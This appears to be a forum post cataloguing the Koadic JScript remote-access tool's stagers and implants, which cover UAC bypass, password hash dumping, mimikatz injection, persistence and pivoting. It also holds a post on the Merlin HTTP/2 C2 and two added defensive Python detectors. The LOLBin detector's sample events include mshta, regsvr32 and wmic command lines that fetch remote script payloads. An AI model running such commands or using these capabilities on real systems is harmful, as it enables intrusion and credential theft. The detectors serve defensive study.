      Koadic
      By 0x1

      Koadic C3 COM Command & Control - JScript RAT


      Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

      It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

      Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.


      1. Hooks a zombie
      2. Elevates integrity (UAC Bypass)
      3. Dumps SAM/SECURITY hive for passwords
      4. Scans local network for open SMB
      5. Pivots to another machine

      Stagers

      Stagers hook target zombies and allow you to use implants.

      Module                     Description
      • stager/js/mshta          serves payloads using MSHTA.exe HTML Applications
      • stager/js/regsvr         serves payloads using regsvr32.exe COM+ scriptlets
      • stager/js/wmic           serves payloads using WMIC XSL
      • stager/js/rundll32_js    serves payloads using rundll32.exe
      • stager/js/disk           serves payloads using files on disk

      Implants

      Implants start jobs on zombies.

      Module                                 Description
      • implant/elevate/bypassuac_eventvwr   Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
      • implant/elevate/bypassuac_sdclt      Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
      • implant/fun/zombie                   Maxes volume and opens The Cranberries YouTube in a hidden window.
      • implant/fun/voice                    Plays a message over text-to-speech.
      • implant/gather/clipboard             Retrieves the current content of the user clipboard.
      • implant/gather/enum_domain_info      Retrieves information about the Windows domain.
      • implant/gather/hashdump_sam          Retrieves hashed passwords from the SAM hive.
      • implant/gather/hashdump_dc           Domain controller hashes from the NTDS.dit file.
      • implant/gather/user_hunter           Locates users logged on to domain computers (using Dynamic Wrapper X).
      • implant/inject/mimikatz_dynwrapx     Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
      • implant/inject/mimikatz_dotnet2js    Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
      • implant/inject/shellcode_excel       Runs arbitrary shellcode payload (if Excel is installed).
      • implant/manage/enable_rdesktop       Enables remote desktop on the target.
      • implant/manage/exec_cmd              Runs an arbitrary command on the target, and optionally receives the output.
      • implant/persist/add_user             Creates a local/domain user.
      • implant/persist/registry             Adds a Koadic payload to the registry.
      • implant/persist/schtasks             Adds a Koadic payload as a Scheduled Task.
      • implant/persist/wmi                  Adds a Koadic payload as a WMI subscription.
      • implant/phishing/password_box        Prompts a user to enter their password.
      • implant/pivot/stage_wmi              Hooks a zombie on another machine using WMI.
      • implant/pivot/exec_psexec            Runs a command on another machine using psexec from Sysinternals.
      • implant/scan/tcp                     Uses HTTP to scan open TCP ports on the target zombie LAN.
      • implant/utils/download_file          Downloads a file from the target zombie.
      • implant/utils/multi_module           Runs a number of implants in succession.
      • implant/utils/upload_file            Uploads a file from the listening server to the target zombies.

      Disclaimer

      Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

      Source & Download: Hidden Content

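The stager table in the post above lists the Windows script hosts Koadic uses to fetch and run its payloads (mshta.exe HTML Applications, regsvr32.exe scriptlets, wmic.exe XSL, rundll32.exe, or a file on disk). As an added defensive example, not part of Koadic or of this post, the Python below scans process-creation events for those hosts combined with a remote payload source, an inline script protocol handler, WMIC stylesheet rendering, a script-type payload file, or an Office parent process, and grades each hit. The event format (image|parent|command line, loosely modelled on process-creation telemetry fields), the sample events and their TEST-NET addresses are all constructed, and the indicator lists are assumptions to tune to your own environment.

```python
"""Flag Windows Script Host / LOLBin stager patterns in process-creation events.

Added defensive example (not Koadic code). Events are constructed and use the
simplified form "image|parent image|command line".
"""
import re
from dataclasses import dataclass

# Script hosts from the stager table plus the classic WSH interpreters (assumed set).
SCRIPT_HOSTS = {"mshta.exe", "regsvr32.exe", "wmic.exe", "rundll32.exe",
                "wscript.exe", "cscript.exe"}
# Parents that should rarely launch a script host at all (assumed set).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

REMOTE_RE = re.compile(r"(?i)\b(?:https?|ftp)://|\\\\[\w.-]+\\")  # URL or UNC path
SCRIPT_PROTO_RE = re.compile(r"(?i)\b(?:javascript|vbscript):")   # inline script handler
SCRIPT_EXT_RE = re.compile(r"(?i)\.(?:hta|sct|wsf|xsl|js|jse|vbs|vbe)\b")

# Constructed sample events (198.51.100.0/24 is a documentation range).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\mshta.exe|winword.exe|mshta.exe http://198.51.100.7/a.hta",
    r"C:\Windows\System32\regsvr32.exe|cmd.exe|regsvr32.exe /s http://198.51.100.7/s.sct",
    r'C:\Windows\System32\wbem\WMIC.exe|powershell.exe|wmic.exe os get /format:"http://198.51.100.7/x.xsl"',
    r"C:\Windows\System32\rundll32.exe|explorer.exe|rundll32.exe javascript:CONSTRUCTED_SAMPLE",
    r"C:\Windows\System32\regsvr32.exe|msiexec.exe|regsvr32.exe /s C:\Program Files\Vendor\lib.dll",
    r"C:\Windows\System32\mshta.exe|explorer.exe|mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta",
    r"C:\Windows\System32\notepad.exe|explorer.exe|notepad.exe notes.txt",
]


@dataclass
class Finding:
    image: str
    parent: str
    severity: str
    reasons: list


def analyze(event: str):
    """Return a Finding for a suspicious script-host launch, or None."""
    image_path, parent, cmdline = event.split("|", 2)
    image = image_path.rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return None
    reasons = []
    if REMOTE_RE.search(cmdline):
        reasons.append("remote payload source (URL or UNC path)")
    if SCRIPT_PROTO_RE.search(cmdline):
        reasons.append("inline script protocol handler")
    if image == "wmic.exe" and "/format:" in cmdline.lower():
        reasons.append("WMIC XSL stylesheet rendering")
    if SCRIPT_EXT_RE.search(cmdline):
        reasons.append("script-type payload file")
    if parent.lower() in OFFICE_PARENTS:
        reasons.append(f"spawned by Office process {parent}")
    if not reasons:
        return None
    # Pulling code from the network or running it inline is high severity; a local
    # script file or an unusual parent on its own is worth a look but not an alarm.
    high = any(r.startswith(("remote", "inline", "WMIC")) for r in reasons)
    return Finding(image, parent, "high" if high else "medium", reasons)


def scan(events):
    """Run analyze() over an iterable of events and keep the hits."""
    return [f for f in map(analyze, events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.image} <- {f.parent}: {'; '.join(f.reasons)}")
```

The legitimate regsvr32.exe registration of a vendor DLL and the notepad.exe launch produce no finding; the local .hta under a user's Temp directory is graded medium rather than high because nothing on its command line reaches the network.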

      Similar Content

        • By 0x1
          Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

          HTTP/2 is a newly ratified protocol documented under RFC 7540 that aims to solve some of the problems with HTTP/1.x and provide functionality to support current web application operations. HTTP/2 communications are multiplexed, bi-directional connections that do not end after one request and response. Additionally, HTTP/2 is a binary protocol, which makes it more compact, easy to parse, and not human readable without the use of an interpreting tool.
          An HTTP/2 connection can be set up by upgrading an HTTP/1.x connection using the `Upgrade` header or during the negotiation of a TLS encrypted channel. Application-Layer Protocol Negotiation (ALPN) is a TLS 1.2 extension that is required to set up an HTTP/2 connection identified with the `h2` protocol string. TLS versions less than 1.2 are not equipped to negotiate an HTTP/2 connection. Oddly enough, the client will perform one final check to ensure that the server can speak HTTP/2 by sending the string PRISM. This reminds me of the NSA PRISM program.
          An introductory blog post can be found: Hidden Content
          Demo: Hidden Content
          Source & Download: Hidden Content
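The Merlin post above describes the two ways an HTTP/2 channel is established, ALPN during the TLS handshake and the "PRISM" check the client sends; the exact bytes of that check are the 24-octet client connection preface from RFC 7540 section 3.5, `PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n`. The Python below is an added example, not Merlin's code and not part of the post: it identifies HTTP/2 at the start of a captured stream either by that cleartext preface or by an `h2` entry in the ALPN extension of a TLS ClientHello, which is what a network defender keys on to tell HTTP/2 traffic apart from HTTP/1.x before any content is visible. The ClientHello builder only produces constructed sample input (zeroed random, one cipher suite) and is not a TLS implementation; the labels returned by classify_stream are my own naming.

```python
"""Identify HTTP/2 at the start of a stream: cleartext connection preface, or h2 in
the ALPN extension of a TLS ClientHello.

Added example for traffic analysts (not Merlin code). The ClientHello builder only
produces constructed sample input; it is not a TLS implementation.
"""
import struct

# RFC 7540 section 3.5: 24-octet client connection preface ("PRI ... SM").
H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
ALPN_EXT = 0x0010  # RFC 7301 extension type


def build_client_hello(alpn_protocols=None):
    """Constructed minimal TLS 1.2 ClientHello carrying the given ALPN names."""
    body = b"\x03\x03" + bytes(32)                 # client_version + zeroed random
    body += b"\x00"                                # empty session_id
    body += struct.pack("!H", 2) + b"\xc0\x2f"     # one cipher suite
    body += b"\x01\x00"                            # compression_methods: null only
    exts = b""
    if alpn_protocols is not None:
        names = b"".join(bytes([len(p)]) + p for p in alpn_protocols)
        alpn = struct.pack("!H", len(names)) + names
        exts += struct.pack("!HH", ALPN_EXT, len(alpn)) + alpn
    body += struct.pack("!H", len(exts)) + exts
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def alpn_protocols(record):
    """ALPN names offered in a TLS ClientHello record; [] if absent or not a ClientHello."""
    try:
        if record[0] != 0x16:                          # not a TLS handshake record
            return []
        rec_len = struct.unpack("!H", record[3:5])[0]
        hs = record[5:5 + rec_len]
        if hs[0] != 0x01:                              # not a ClientHello
            return []
        body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
        pos = 2 + 32                                   # skip client_version and random
        pos += 1 + body[pos]                           # session_id
        pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]   # cipher_suites
        pos += 1 + body[pos]                           # compression_methods
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:                          # walk the extension list
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            data = body[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            if etype == ALPN_EXT:
                names, p, out = data[2:], 0, []        # skip the 2-byte list length
                while p < len(names):
                    n = names[p]
                    out.append(names[p + 1:p + 1 + n].decode("ascii", "replace"))
                    p += 1 + n
                return out
    except (IndexError, struct.error):
        pass                                           # truncated or malformed input
    return []


def classify_stream(first_bytes):
    """Label the first bytes a client sent on a connection."""
    if first_bytes.startswith(H2_PREFACE):
        return "h2c: cleartext HTTP/2 connection preface"
    offered = alpn_protocols(first_bytes)
    if "h2" in offered:
        return "h2: HTTP/2 offered via TLS ALPN"
    if offered:
        return "tls: ALPN without h2 (" + ", ".join(offered) + ")"
    if first_bytes[:1] == b"\x16":
        return "tls: no ALPN extension"
    return "other"


if __name__ == "__main__":
    for sample in (build_client_hello([b"h2", b"http/1.1"]), build_client_hello(),
                   H2_PREFACE + b"\x00\x00\x00\x04\x00\x00\x00\x00\x00", b"GET / HTTP/1.1\r\n"):
        print(classify_stream(sample))
```

Note that ALPN only tells you what the client offered; the negotiated protocol is in the ServerHello, and with TLS 1.3 the preface itself travels encrypted, so on a TLS channel the ALPN offer is usually the only cleartext signal available.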